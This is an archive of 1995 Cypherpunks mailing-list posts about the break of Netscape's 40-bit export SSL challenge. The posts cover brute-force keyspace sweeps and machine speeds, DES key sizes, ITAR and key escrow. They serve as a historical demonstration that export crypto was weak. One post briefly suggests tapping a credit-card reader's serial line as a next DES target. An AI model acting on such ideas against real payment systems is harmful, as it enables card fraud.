ferocious rate if you had lots of keys to break.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 17 Aug 95 14:48:25 PDT
To: sean@escape.ca
Subject: Re:  More on Netscape
Message-ID: <9508172151.AA14704@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>It says that the commerce server supports (among others) DES and DES3 
>(same as 3DES?).  They list the key sizes as 64 and 192 bits 
>respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt 
>that would be 64 I guess), but isn't DES3 112 bits, not 192?

DES keys are specified as 64 bits, of which 8 bits provide odd parity.

The 192 bits would specify three independent keys (not triple DES)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 12:51:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Silly technical question from a non-technical person
Message-ID: <Pine.ULT.3.91.950817144743.16545A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm be piceing together things on this list that I have only a passing 
understanding of (at a code level).

If it costs $10,000 to crack one 40-bit key (putting aside whether we 
agree on that price or not), could not the software be designed in such a 
manner that it is able to check, say, 10,000 keys at the same time?  Ie, 
it computes a key, and then checks it against the array of data to see if 
it fits any of them, and then goes on to the next one.

Maybe that would be an interesting test.  Randomly compute say 10,000 
sessions and they try to crack them all at the same time.  Theoretically, 
it would reduce that $10,000/crack cost dramatically.

Of course, I could very well be wrong....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDOByjokqlyVGmCFAQHFeAP9Hi9rXt1Ij4+nXISXMdfQL7TglB5T0p5P
o80KP3PExZ7BqPVrLK9at831SOOVBIN2qzkFcLo7VTOfsrtc95Oyit6Kkk6+PBQQ
4dmuTjbBtRTFi92a4r5RAIXBlLYaATGSZGI3UUSE4m/PoeOWwAhjl/sweu/g/1Q2
ZsRCz9wefR4=
=HlUL
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Thu, 17 Aug 95 15:34:03 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Another SSL breakage...
In-Reply-To: <7849.9508171510@exe.dcs.exeter.ac.uk>
Message-ID: <199508172217.PAA10756@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



where can the software be obtained I would like to run it on my dual pentium
under solaris 2.4 for benchmarking...

     thanx in advance
     kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 15:20:08 PDT
To: cypherpunks@toad.com
Subject: Re: More on Netscape
In-Reply-To: <9508172151.AA14704@argosy.MasPar.COM>
Message-ID: <199508172219.PAA04481@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Various people said:
> >It says that the commerce server supports (among others) DES and DES3
> >(same as 3DES?).  They list the key sizes as 64 and 192 bits
> >respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt
> >that would be 64 I guess), but isn't DES3 112 bits, not 192?

> DES keys are specified as 64 bits, of which 8 bits provide odd parity.
> The 192 bits would specify three independent keys (not triple DES)

Real-world DES implementations ignore those 8 "parity" bits.  DES uses
56 bits of key for encryption, and calling it a 64 bit key is misleading.

Triple DES (3DES) is an overloaded term.  It's used in 2- and 3-key
versions, for 112 and 168 bits of protection respectively.

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 22:18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darrell Perko <dperko@efn.org>
Date: Thu, 17 Aug 95 15:26:30 PDT
To: cypherpunks@toad.com
Subject: I need an exportable crypto algorithm.
Message-ID: <Pine.SUN.3.91.950817151721.6913A-100000@haus.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


Greetings;
	I realize that bad crypto is offensive to some here but I am in 
desperate need of an exportable, public-domain, general-purpose crypto
algorithm.  Or at least the rules for creating such.

	Sorry to bother y'all with this, but I am in dire straights.

	Thanks,
	Darrell Perko
	dperko@efn.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 06:52:59 PDT
To: cypherpunks@toad.com
Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <9508171352.AA02309@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>In general, it just adds more flames to the fire started by the
>letter written by Microsoft, IBM and Lotus. Their point is bolstered
>by this easy attack.

Well, that was the whole point of the challenge, wasn't it ?
Why didn't the journalists didn't write their articles one month ago
when Hal posted his challenge ?

What I find surprising is that it took as long as one month.  I was
even surprised when it wasn't done after two weeks, and that's when I
started working on it.

-- Damien
P.S. check out <URL:http://pauillac.inria.fr/~doligez/ssl/press-conf.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 17 Aug 95 14:25:23 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: Silly technical question from a non-technical person
Message-ID: <9508172055.AA15978@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> - For DES I think so, asked for others opinions, this might be the
>   next one to die, big project but possibly doable with lots of keys
>   at once
> 

But, what is a good DES target to attack??  SSL was a great target
because it is both visible and because it has a well
defined open specification that made it easy to determine 
exactly what to attack (unlike Microsoft Access).

I know someone who *used* to be in the ATM transaction 
business, but is no longer.  Is the code from a credit card
reader DES encrypted?  We could be possible "tap" the serial
port between the reader and the modem and get a byte 
stream in that manner.... but then again, my knowledge
of those beasts is pretty limited.

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Thu, 17 Aug 95 14:03:07 PDT
To: cypherpunks@toad.com
Subject: More on Netscape
Message-ID: <Pine.SOL.3.91.950817155625.15215j-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


I guess most everybody has seen the response that Netscape put on their 
page, but did people check out the "for more info" link 
(http://home.netscape.com/newsref/std/key_security.html)

It says that the commerce server supports (among others) DES and DES3 
(same as 3DES?).  They list the key sizes as 64 and 192 bits 
respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt 
that would be 64 I guess), but isn't DES3 112 bits, not 192?

Just wondering...

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 07:04:41 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <9508171404.AA02355@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Joe Buck <jbuck@Synopsys.COM>
>However, I disagree with your conclusion:
[...]
>There's plenty of stuff that *does* need protection, but I'm not sure
>credit card #'s head the list.

You're right, of course, if you discount the hassle of getting the
transactions cancelled whenever your credit card number is used
fraudulently.

I have much a better example (and a real one, too):

I have an account at Wells Fargo Bank near San Fransisco.  They
recently started offering web access to their customers.  That would
be great for me because banking by phone is pretty expensive when I'm
in France, and it's not always easy for me to understand American
accents.

So they would give me a password that I can use for some set of
operations.  I don't know which one exactly, but I would expect it to
include electronic transfers from my account to anywhere else.  The
password is protected by the SSL connection.  That would be fine if I
had the full SSL security, but in France I can only get the exportable
version of Netscape.  As a result, I won't be using this service.

There's the beginning of a market for full-SSL clients and servers
outside the US.  Maybe Netscape should go multinational right now.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 08:11:06 PDT
To: cypherpunks@toad.com
Subject: Another SSL breakage...
Message-ID: <7849.9508171510@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


All hell seems to have broken loose whilst I was lazing on the beach
yesterday.  SSL breakings, big name newspaper newsreports (of varying
degrees of accuracy), and much ITAR bashing (yay!) or perhaps that
should be nooooh! 'cos I might be doing myself out of work as a UK
crypto hacker (as John Hemming said in the article Robert Hettinga
forwarded) if we loose the fun advantage of being in the free world,
and not having to follow the ITAR nonsense.

Anyway, congratulations Damien!

As Hal said, another group was working on the SSL challenge (albiet
just for software testing purposes).  Here's the story....

on Tue, 15 Aug 1995 10:43:15 +0200 I recieved this from David Byers
<davby@ida.liu.se>:

> Eureka!
>  
> Encrypted Master Key: 7ef0961fa6
>  
> [...]

So who was first?  David hit it Tue 10:43 GMT+2.

Doesn't matter, the more the merrier, and the better to demonstrate
the silly ITAR export restrictions.

This was a trial run at breaking it which two people had done just to
check if their respective software was working correctly.  It appears
that it was :-).  This testing was some of the reason for the slowness
in getting the group effort started, we were very keen to ensure it
really would work, and that the software was working perfectly.
Disappointment with the RC4 bruting demonstrated the importance of
checking first.  On with the story,

Davids eureka arrived Tuesday, I tinkered with it some, but was
interpreting it wrongly and left it for that day, then I was away
yesterday (at the beach with wife and kids, nice weather over here),
and figured out how to apply the key this morning (with a bit of
prompting from Hal as to what I was doing wrong), just after reading
Damien's announce on cpunks, where he independently bruted it on a
farm of workstations.

Here's the output, with the "Mr Cosmic Kumquat" from "SSL Trusters Inc":

> PPOST /order2.cgi HTTP/1.0Referer: https://order.netscape.com/order2.cgi
> User-Agent: Mozilla/1.1N (Macintosh; I; PPC)
> Accept: */*
> Accept: image/gif
> Accept: image/x-xbitmap
> Accept: image/jpeg
> Content-type: application/x-www-form-urlencoded
> Content-length: 472
> 
> source-form=order2-cust.html&order_number=31770&prod_80-01020-00_Mac=1&carrier_code=UM&ship_first=Cosmic&ship_last=Kumquat&ship_org=SSL+Trusters+Inc.&ship_addr1=1234+Squeamish+Ossifrage+Road&ship_addr2=&ship_city=Anywhere&ship_state=NY&ship_zip=12345&ship_country=USA&ship_phone=&ship_fax=&ship_email=&bill_first=&bill_last=&bill_org=&bill_addr1=&bill_addr2=&bill_city=&bill_state=&bill_zip=&bill_country=USA&bill_phone=&bill_fax=&bill_email=&submit=+Submit+Customer+Data+

(I won't bother formating it more cleanly as Damien has already done
the honors).

I think a group effort ought to be done now that we are confident of
the software, just to see how darn fast we (cypherpunks as a group)
can knock off SSL keys.  (This one was done by 2 people for testing
purposes, and independently by Damien (who we didn't know was working
on it)).  I'd really like to work up to a really meanly few hours
breakage, as it looks that much more impresive.  The next media
release ought to be of a steady offer, of the form, cpunks break keys
in x hours, where x is a very small number.  And not just break one
key, but will break lots of keys, as required, until something is done
about it (ITAR) :-)

Eric Young is currently away on holiday, but I have his machine stats
from earlier email, where he explained the hardware he was testing on.

Eric swept 8000 - FFFF, and David 0000 - 7ef0 (where he hit the key)

Machine stats for this bruting:

1 x 16k processor MasPar MP-1 - 1.5M keys/sec

4 CPUs of R4400 200mhz	      - 24000 keys/sec
4 CPUs of sparc  60mhz	      - 17500 keys/sec
2 CPUs of sparc  50mhz        - 14800 keys/sec
1 CPU of Pentium 75mhz	      - 10200 keys/sec
1 CPU of Alpha		      - 10000 keys/sec
2 CPUs of 88100		      -  8000 keys/sec
1 CPU of 88000		      -  3500 keys/sec
1 CPU of R3000 36mhz	      -  3800 keys/sec
49 CPUs of 486DX 50mhz	      -  3780 per src

The workstations total: - 424,320 keys/sec, and the Maspar 1.5M keys/sec
on it's own.

The 0000 - 8000 sweep was finished Aug 11 (he might have finished a
day or two earlier, that's when he replied to my question as to how he
was getting on.  He left for his holiday after that email.

The MasPar sweepings were going fast, swept 0000 - 795d (this was
sometime before the 11th Aug) but someone else wanted the machine, so
a pause ... and then (presumably Tues morning) 795d - 7ef0 and bang he
hit it.

We were getting worried about the possibility of software failure by
then as we'd already swept 8000 - FFFF and 0000 - 795D accounting for
97.4% of the key space.

It was hiding away in the last bit of unswept keyspace.  Luck of the
draw...

A few quick calculations:

The maspar alone could do the entire keyspace in 8 1/2 days, or an
expected average time of ~100 hours.  I believe I'm right that there
would be lots of organisations which would sell you idle maspar hours
for a lot less than $100 / hr.

Heck you could do it with PC's, if they (WSJ article) think it's worth
$10k all I can say is "give me the $10k", and I'll do it and make a
handsome profit.

The workstation farm, at 424k keys/sec could do the job in 30 days, or
15 days average.  The workstation farm was only used to sweep half the
key space, and was used overnight (12 hours) and weekends (61 hours)
only as people were using the machines during the day.

Could it have been done with out anyone knowing?  Hell, yes - it was
in fact, no announce was made as it was just testing etc.

Adam
- --
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
- --rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
- -------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMDNbnSnIuJ1VakpnAQHe9AP8DJBhZ8LyRNx7PO1GY076Cap+xzdS0/ys
WE/tdm0GBfjqxvjtar85mmc1hZVPCn1m5Swsflk2ZpieLbwUzHz+g1ciW3IiZu1Y
8Qc2HJxWRrez3J5CeiMHgMJl6Bj6vF5XAWLW0v6NpujbOR9XuIjsKnH3jKvkhLF5
z0u7Oui0AX0=
=nkmn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George T. Talbot" <george@knucklehead.phat.com>
Date: Thu, 17 Aug 95 13:31:37 PDT
To: cypherpunks@toad.com
Subject: Dumb question (Re: RSA T-Shirt)
Message-ID: <199508172022.QAA16980@knucklehead.phat.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to bother the entire list with this...anybody got the e-mail 
address of the USA seller of the 3-lines of Perl RSA T-Shirt?  I haven't
received mine yet and I can't find the e-mail address.

Again...Sorry for adding to the traffic.

----------
George T. Talbot
<george@phat.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 17 Aug 95 07:35:16 PDT
To: cypherpunks@toad.com
Subject: UK Independent on SSL crack
Message-ID: <199508171435.QAA05353@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



from the "ukpipeline" :-)


>>>>>>>>>>>>>>>>>>>>

UK Indpendent newspaper, 17/8/1995

Internet's 30bn Pound Secret Revealed

Charles Arthur
Technology Correspondent

A French student has cracked the most commonly used encryption system 
used to pass financial transactions over the Internet, threatening a 
business forecast to be worth billions of pounds worldwide.

Damien Doligez, 27, a PhD student at the Inria research centre near 
Paris, broke a software "key" used by the Netscape browsing program, 
which lets users navigate the World Wide Web.

With Netscape, Internet users can visit shopping "sites" on the Web and 
order goods by sending their credit card and address over the network to 
the site.  To prevent anyone picking up those confidential details as 
they pass through the network, they are encrypted first using a software 
"key".  This is the system used for example by Barclays Bank's 
"BarclaySquare" project, launched in May, which offers access to eight 
major retailers.  Market research companies forecast that money 
transmission over the Internet will be worth more than 30bn pounds by 
2005.

At the launch of BarclaySquare, Roger Alexander, managing director of the 
unit said: "The encryption method has been rigorously tested by us".  But 
Mr. Doligez has compromised that security by decoding a test example of 
an encrypted transaction, posted on a number of Internet discussion 
groups in July.

The transaction was scrambled using a digital key 40 bits long, which 
offers about 1,000 billion ( a million million) possible combinations.  
Mr Doligez harnessed spare time on 120 workstations and parallel 
computers.  The computers turned up the answer after eight days.

"I wouldn't trust my credit card number to Netscape," Mr Doligez told the 
Independent from Paris yesterday.

Netscape Communications, whose flotation on the New York Stock Exchange 
raised more than $1bn, said "We have always said this would be 
theoretically possible."

[end]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darrell Perko <dperko@efn.org>
Date: Thu, 17 Aug 95 16:42:21 PDT
To: cypherpunks@toad.com
Subject: I need exportable crypto revisited.
Message-ID: <Pine.SUN.3.91.950817163344.7854B@haus.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


Greetings;

	Thank you all for your amazingly quick responses!  However, I
should have noted in my original message that this encryption is to meet
a contractual point for a commercial product to be delivered soon.  The
product can have one and one only version to be boxed and shipped and
will be sold internationally.  The encryption portion will be dynamically
linked, so real encryption will be available on the net just not in the box.

	Thanks,
	Darrell Perko
	dperko@efn.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 17 Aug 95 09:29:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netsacpe's Offical Response
In-Reply-To: <199508171711.MAA02559@spectrum.bradley.edu>
Message-ID: <Pine.SOL.3.91.950817172311.26996D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995, Glenn Powers forwarded Netscape's official response:

> So in conclusion, we think RC4-40 is strong enough to protect consumer-level
> credit-card transactions -- since the cost of breaking the message is
> sufficiently high to make it not worth the computer time required to do so

That was a rather silly thing to say.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 17:30:36 PDT
To: cypherpunks@toad.com
Subject: Re: I need exportable crypto revisited.
In-Reply-To: <199508180000.UAA00325@frankenstein.piermont.com>
Message-ID: <199508180030.RAA04988@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@piermont.com> writes:
> If you have hooks for arbitrary encryption, you will find it to be
> virtually impossible to export the product.

That's my understanding also (as I told him in e-mail) but I haven't found
any legal justification for it.  I spent a while poring over the ITARs,
section XIII.b (ftp://ftp.cygnus.com/pub/export/itar.in.full), and I
didn't see anything that looked likely.  Maybe "ancillary equipment" in
XIII.b.5, but that seems a stretch and is not at all specific.

I note that hash algorithms for message authentication are specifically
excluded from control in XIII.b.1.vi, which conflicts with what I was told
by somebody who'd gotten a nastygram from Commerce.  Sort of a relief,
since I've been giving my SHA implementation away freely
(rand.org:pub/jim/sha.tar.gz).

Has anybody who's been impaled on the stinky end of this stick been told the
chapter and verse?

	Jim Gillogly
	Sterday, 26 Wedmath S.R. 1995, 00:21




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 08:35:45 PDT
To: cypherpunks@toad.com
Subject: Re:  Another SSL breakage...
Message-ID: <9508171532.AA02772@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: aba@atlas.ex.ac.uk
>on Tue, 15 Aug 1995 10:43:15 +0200 I recieved this from David Byers
><davby@ida.liu.se>:
>
>> Eureka!
>>
>> Encrypted Master Key: 7ef0961fa6

Then David beat me by about two hours.  My program found the result at
12:23 +0200 on the same day.  I was not at work (aug 15 is a holiday
in France), so I saw it a few hours later, and I wrote my announcement
yesterday.

I will happily redirect all the journalists to David...

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 17 Aug 95 09:44:51 PDT
To: cypherpunks@toad.com
Subject: Re: Netsacpe's Offical Response
Message-ID: <Pine.3.89.9508171736.A1363-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



>      In this case he had to use roughly
>      $10,000 worth of computing power (ballpark figure for having access to
>      120 workstations and a few parallel supecomputers for 8 days) to break
>      a single message.

Hmm, I don't know about anyone else around here, but my workstation is
idle 99% of the time. I could almost certainly get access to all the spare
CPU cycles on 120 workstations for free, and I suspect that a lot of
people (particularly hackers) could do so as well. There's no need to
spend $ 10,000 on renting them. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Thu, 17 Aug 95 14:49:34 PDT
To: cypherpunks@toad.com
Subject: Non-News Govt Announcement on Key Escrow
Message-ID: <v01530501ac59673a4252@[205.177.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


The White House and NIST annouced today that they were planning to hold two
open meetings next month to develop standards for "acceptable" software key
escrow.  The standards will then be made into a FIPS. The programs cannot
have keys larger than 64 bits.

Its great to see that it only took them 18 months (since Feb. 94) to come
up with a call for public meetings for something that nobody really wants
anyway, expcept for the officals who plan to make it mandatory by slipping
it through bit by bit and a couple of vendors.  (sorry, sarcasm mode
off...)


-d (in non-official sarcastic mode today from home)


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Thu, 17 Aug 95 18:21:30 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508180058.RAA02949@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Says Joe Buck:

> > >Should some bad person get hold of your card number and misuse
> > >it, you're not out any money: 
> > 
> > I'm not so sure....Checked the fees/interest lately?
> > "There ain't no such thing as a free credit card theft."
>
> Yes, it's true that this contributes to high interest rates (though
> defaults cost more than fraud).

Certainly not only that. In fact you pay directly for weak credit card
security through taxes used to legislate, police, try, and jail
fraudsters. Add to that the cost to society of keeping these people in
jail instead of more productive occupations. Add the time wasted
straightening out bogus transactions. Add the cost of delaying
purchases and action because of the (maybe irrational) fear that no
secure payment system is available.

The argument that fraud existed before credit cards is only a
technically correct statement. It does not bear. The point is, credit
card transactions could be much more secure, at sometimes trivial cost,
making much fraud disappear. Unfortunately, in this case, insecure
credit cards are not an obstacle to banks making money, so why should
they care?  Credit card fraud does not prevent politicians from being
re-elected, so why should they care?  Same would apply to car
manufacturers: easily stolen cars do not prevent them from making
money, so why should they care?

When 'bad persons' misuse credit cards, the cost to us is very real,
just well hidden by all involved.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Thu, 17 Aug 95 17:01:44 PDT
To: sean@escape.ca (Sean A. Walberg)
Subject: Re: More on Netscape
In-Reply-To: <Pine.SOL.3.91.950817155625.15215j-100000@wpg-01.escape.ca>
Message-ID: <199508180001.SAA18182@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I guess most everybody has seen the response that Netscape put on their 
> page, but did people check out the "for more info" link 
> (http://home.netscape.com/newsref/std/key_security.html)
> 
> It says that the commerce server supports (among others) DES and DES3 
> (same as 3DES?).  They list the key sizes as 64 and 192 bits 
> respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt 
> that would be 64 I guess), but isn't DES3 112 bits, not 192?
> 
> Just wondering...
> 

That would be one key for encrypting, another key for decrypting and a third
key for encrypting again.  64*3=192.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 17 Aug 95 10:02:57 PDT
To: steve@webmedia.com
Subject: First known purchase of physical goods with cyberbucks
Message-ID: <Pine.3.89.9508171704.A1363-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



[Feel free to forward to anywhere you feel is appropriate]

-----BEGIN PGP SIGNED MESSAGE-----


For some time now, Adam Back has been offering to sell RSA T-shirts for
cyberbucks (DigiCash's experimental anonymous digital cash system), but
no-one has had enough available to take him up on it. However, thanks to
the success of the ecm mailing list (ecm@ai.mit.edu) and WWW site
(http://www.c2.org/~mark/ecash/ecash.html), today I finally managed to 
collect enough c$ to buy one.

It was something of a feat to gather that many c$ in one place, as
the number of sellers is limited. There are many more buyers than
sellers, everyone wants c$, but few people are selling at a realistic
price. As it stands, we have managed to take a worthless currency (c$
are not backed with anything) and give it value based solely on what the 
market is willing to pay for it, due to its security, anonymity and ease 
of use advantages compared to the other digital payment systems on the 
Net. Once a DigiCash licensee starts offering to sell (and buy) ecash 
via VISA/MasterCard and chequing account, I could see ecash getting very
popular very quickly.

Using ecash once you've got the c$ in your ewallet/DigiCash bank
account is near instant. If used through the WWW forms interface as 
provided by the Windows and X-windows user interface, the transaction 
is as easy as clicking on a button. Instant buy, much more convenient 
than filling in credit card forms, talking to people on the phone, 
sending things in snail mail, etc, and anonymous too. Now you can 
even use the beta-test currency to buy and sell physical goods as well.

Anyway, if anyone knows of an earlier transaction of cyberbucks for physical 
goods than this (at 15:00 GMT 17th August 1995), then please let me know. 
Also, if you have c$ that you wish to sell, or have run out and want to buy 
some more, come along and join in the fun on the WWW site or mailing list...

	Mark

P.S. If anyone in the UK wants to buy a rusty but reliable FIAT X1/9
convertible, it's yours for only 5,000 cyberbucks...

(For the record, I have no connection to DigiCash other than as an ecash
 beta tester, and the ecash market is not supported by them in any way.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAgUBMDN1YFVvaTo9kEQVAQE4Bwf/WYTlYShkIyP0jOLyDmOpG/Bzdya5q+Xp
QY60CS8Po/cSIEPy26cDs62Yn5HIEq0g+afw0NZS4BiH2xanqDFnwrumNE78q2iW
03AlX/RuDkGFabpxUfFoYRkf2qgsDI1wnt7vzryKlxgBSGzoEGS7j7UKesEtASIl
3iw3EgINnX+BN7nSWsLcpyN3BHUPKxLSKWUg/hduS7D8AlVqMFq8JUu2wDKxJwJV
1FJ5oN8dF5bSa+VQINA4LXK9Nx/DVqMGAedg37E3/CGuassGBfW1YtTiRwauaj6q
cV7D2zg52hvoq7qeQdesWHLUeqBbK9U/7Xbb80SP87eny+1XkIsgig==
=M1jD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Thu, 17 Aug 95 15:34:24 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508172234.SAA21241@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




John Pettitt <jpp@software.net> writes:
>On Wed, 16 Aug 1995, Damien Doligez wrote:
>>   The exportable SSL protocol is supposed to be weak enough to be
>>   easily broken by governments, yet strong enough to resist the attempts
>>   of amateurs.
>
>Exactly.
>
>>               It fails on the second count.  Don't trust your credit
>>   card number to this protocol.
>
>Huh?  So you run on 120 workstations worth how much?  to steal a credit
>card number worth how much?  Get real - there are hundreds of ways
>to get credit card numbers that cost less.  ...

SSL can of course be used to protect information other than credit card #s.
It is supposed to be strong enough to resist the attempts of amateurs, yet
it was broken not by a government, not by a three letter agency, not by a
major corporation, but by a grad student with a lot of spare cycles.

In other words, it was broken by an amateur.  The real issue is not cc#s,
the real issue is: does it do what it was designed to do (foil amateur
attempts), and the answer is: no, not so long as it is export-restricted
to only 40 secret bits of key.

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 15:36:43 PDT
To: Darrell Perko <dperko@efn.org>
Subject: Re: I need an exportable crypto algorithm.
In-Reply-To: <Pine.SUN.3.91.950817151721.6913A-100000@haus.efn.org>
Message-ID: <199508172235.SAA00248@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Darrell Perko writes:
> 	I realize that bad crypto is offensive to some here but I am in 
> desperate need of an exportable, public-domain, general-purpose crypto
> algorithm.  Or at least the rules for creating such.

Make it so weak to be useless. Of course, you don't need it if its
that weak.

> 	Sorry to bother y'all with this, but I am in dire straights.

Why not just get a decent algorithm abroad? Why would you want to
export a useless one?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 17 Aug 95 10:51:13 PDT
To: Marcel van der Peijl <bigmac@digicash.com>
Subject: Re: First known purchase of physical goods with cyberbucks
In-Reply-To: <199508171742.TAA15830@digicash.com>
